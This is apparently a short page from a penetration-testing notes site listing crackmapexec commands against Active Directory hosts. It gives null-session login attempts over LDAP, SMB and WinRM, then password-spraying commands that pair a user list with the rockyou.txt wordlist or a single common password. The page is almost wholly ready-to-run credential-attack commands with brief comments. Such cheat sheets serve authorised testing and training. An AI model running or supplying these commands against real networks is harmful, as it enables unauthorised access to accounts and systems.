crackmapexec

#Legacy Anonymous is enabled or DC upgraded from 2003

crackmapexec ldap 10.0.10.1 -u ' ' -p ' '

crackmapexec smb 10.0.10.1 -u ' ' -p ' '

crackmapexec winrm 10.0.10.1 -u ' ' -p ' '

#Password spray AD

#Slow to work through passwords

crackmapexec ldap 10.0.0.1 -u userAccounts.txt -p rockyou.txt

#WinRM for quicker results

crackmapexec winrm 10.0.0.1 -u userAccounts.txt -p rockyou.txt

crackmapexec winrm 10.0.0.1 -u username -p rockyou.txt

crackmapexec winrm 10.0.0.1 -u userAccounts.txt -p Password123

PreviousldapsearchNextenum4linux-ng

Last updated